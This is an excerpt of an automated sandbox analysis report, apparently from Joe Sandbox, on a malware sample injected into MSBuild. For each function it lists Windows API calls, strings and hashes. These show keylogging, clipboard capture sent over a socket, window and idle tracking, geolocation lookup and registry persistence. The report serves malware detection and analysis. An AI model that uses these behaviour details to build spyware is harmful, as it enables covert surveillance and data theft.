                                                                                                                        control_flow_graph 1022 40428c-4042ad connect 1023 4043e1-4043e5 1022->1023 1024 4042b3-4042b6 1022->1024 1027 4043e7-4043f5 WSAGetLastError 1023->1027 1028 40445f 1023->1028 1025 4043da-4043dc 1024->1025 1026 4042bc-4042bf 1024->1026 1029 404461-404465 1025->1029 1030 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1026->1030 1031 4042eb-4042f5 call 420151 1026->1031 1027->1028 1032 4043f7-4043fa 1027->1032 1028->1029 1030->1031 1041 404306-404313 call 420373 1031->1041 1042 4042f7-404301 1031->1042 1034 404439-40443e 1032->1034 1035 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1032->1035 1038 404443-40445c call 401f66 * 2 call 41a686 1034->1038 1035->1028 1038->1028 1054 404315-404338 call 401f66 * 2 call 41a686 1041->1054 1055 40434c-404357 call 420f34 1041->1055 1042->1038 1084 40433b-404347 call 420191 1054->1084 1067 404389-404396 call 4202ea 1055->1067 1068 404359-404387 call 401f66 * 2 call 41a686 call 420592 1055->1068 1081 404398-4043bb call 401f66 * 2 call 41a686 1067->1081 1082 4043be-4043d7 CreateEventW * 2 1067->1082 1068->1084 1081->1082 1082->1025 1084->1028
                                                                                                                        APIs
                                                                                                                        • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                        • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                        • API String ID: 994465650-2151626615
                                                                                                                        • Opcode ID: 9e0300746ced542d644864050c56bad8214476e96f5afa229243408216744f80
                                                                                                                        • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                                        • Opcode Fuzzy Hash: 9e0300746ced542d644864050c56bad8214476e96f5afa229243408216744f80
                                                                                                                        • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                                                        Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                        • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                        • API String ID: 911427763-3954389425
                                                                                                                        • Opcode ID: f8b3156baaa7727dad8a2e60dc5fbc73354b311146034ba8b2c8c954e646e4f0
                                                                                                                        • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                                        • Opcode Fuzzy Hash: f8b3156baaa7727dad8a2e60dc5fbc73354b311146034ba8b2c8c954e646e4f0
                                                                                                                        • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                                        Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1209 40c89e-40c8c3 call 401e52 1212 40c8c9 1209->1212 1213 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1209->1213 1215 40c8d0-40c8d5 1212->1215 1216 40c9c2-40c9c7 1212->1216 1217 40c905-40c90a 1212->1217 1218 40c9d8 1212->1218 1219 40c9c9-40c9ce call 43ac0f 1212->1219 1220 40c8da-40c8e8 call 41a74b call 401e18 1212->1220 1221 40c8fb-40c900 1212->1221 1222 40c9bb-40c9c0 1212->1222 1223 40c90f-40c916 call 41b15b 1212->1223 1234 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1213->1234 1225 40c9dd-40c9e2 call 43ac0f 1215->1225 1216->1225 1217->1225 1218->1225 1231 40c9d3-40c9d6 1219->1231 1243 40c8ed 1220->1243 1221->1225 1222->1225 1235 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1223->1235 1236 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1223->1236 1237 40c9e3-40c9e8 call 4082d7 1225->1237 1231->1218 1231->1237 1248 40c8f1-40c8f6 call 401e13 1235->1248 1236->1243 1237->1213 1243->1248 1248->1213
                                                                                                                        APIs
                                                                                                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LongNamePath
                                                                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                        • API String ID: 82841172-425784914
                                                                                                                        • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                                        • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                                        • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                                        • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                                                        Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32 ref: 00415A46
                                                                                                                        • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                        • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                        • OpenClipboard.USER32 ref: 00415A61
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                        • CloseClipboard.USER32 ref: 00415A89
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2172192267-0
                                                                                                                        • Opcode ID: 20bbd8a9be223023429b86dd59441cf199e90aae28cc1759b9981102a65ca55e
                                                                                                                        • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                                        • Opcode Fuzzy Hash: 20bbd8a9be223023429b86dd59441cf199e90aae28cc1759b9981102a65ca55e
                                                                                                                        • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                                        Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                                        Strings
                                                                                                                        • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                        • String ID: http://geoplugin.net/json.gp
                                                                                                                        • API String ID: 3121278467-91888290
                                                                                                                        • Opcode ID: 6b4a09cc400eb253b86198db5e131c1a7ef1d480120042e2a6393a51d8aeec4d
                                                                                                                        • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                                        • Opcode Fuzzy Hash: 6b4a09cc400eb253b86198db5e131c1a7ef1d480120042e2a6393a51d8aeec4d
                                                                                                                        • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                                        Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                        • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                        • API String ID: 1866151309-2070987746
                                                                                                                        • Opcode ID: 81e27e0eafa7ada8965556ff931baaf3a7dc027ccdadbdb1890a37f2881e35bf
                                                                                                                        • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                                        • Opcode Fuzzy Hash: 81e27e0eafa7ada8965556ff931baaf3a7dc027ccdadbdb1890a37f2881e35bf
                                                                                                                        • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                                        Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1476 4126d2-4126e9 RegCreateKeyA 1477 412722 1476->1477 1478 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1476->1478 1479 412724-412730 call 401eea 1477->1479 1478->1479
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                        • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                        • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValue
                                                                                                                        • String ID: HgF$pth_unenc
                                                                                                                        • API String ID: 1818849710-3662775637
                                                                                                                        • Opcode ID: ddbfc9346cb1df8603390f45d52edca88235b9551560ffb2f18b7b49edab08f4
                                                                                                                        • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                        • Opcode Fuzzy Hash: ddbfc9346cb1df8603390f45d52edca88235b9551560ffb2f18b7b49edab08f4
                                                                                                                        • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                        Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                                                                        • String ID: Offline Keylogger Started
                                                                                                                        • API String ID: 465354869-4114347211
                                                                                                                        • Opcode ID: 500aa7415aebb72bd48f6e411c5bff9981bb0a1ffcdd18614d34843fe97faccd
                                                                                                                        • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                                        • Opcode Fuzzy Hash: 500aa7415aebb72bd48f6e411c5bff9981bb0a1ffcdd18614d34843fe97faccd
                                                                                                                        • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                                        Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                        • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValue
                                                                                                                        • String ID: TUF
                                                                                                                        • API String ID: 1818849710-3431404234
                                                                                                                        • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                        • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                        • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                        • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                        Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3360349984-0
                                                                                                                        • Opcode ID: b5a46ec9b5a55459a009272bbca25cecd91462549485a21a627875659f9e3563
                                                                                                                        • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                        • Opcode Fuzzy Hash: b5a46ec9b5a55459a009272bbca25cecd91462549485a21a627875659f9e3563
                                                                                                                        • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                        Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3604237281-0
                                                                                                                        • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                        • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                                        • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                        • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                                        Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountEventTick
                                                                                                                        • String ID: >G
                                                                                                                        • API String ID: 180926312-1296849874
                                                                                                                        • Opcode ID: d6d82ca6659afa233ab8bf4b33e209ac008b58294be32f34f68e9c45f57fe3cd
                                                                                                                        • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                                        • Opcode Fuzzy Hash: d6d82ca6659afa233ab8bf4b33e209ac008b58294be32f34f68e9c45f57fe3cd
                                                                                                                        • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                                        Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                        • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                                        • String ID: (CG
                                                                                                                        • API String ID: 1925916568-4210230975
                                                                                                                        • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                                        • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                        • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                                        • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                        Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3677997916-0
                                                                                                                        • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                        • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                        • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                        • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                        Function 0041265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3677997916-0
                                                                                                                        • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                                        • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                                        • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                                        • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                                        Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3677997916-0
                                                                                                                        • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                        • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                        • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                        • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                        Function 00415D30 Relevance: 4.5, APIs: 3, Instructions: 33threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001C96F,00000000,00000000,00000000), ref: 00415D4A
                                                                                                                        • ShowWindow.USER32(00000009), ref: 00415D64
                                                                                                                        • SetForegroundWindow.USER32 ref: 00415D70
                                                                                                                          • Part of subcall function 0041BEB0: AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                                          • Part of subcall function 0041BEB0: ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                                          • Part of subcall function 0041BEB0: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
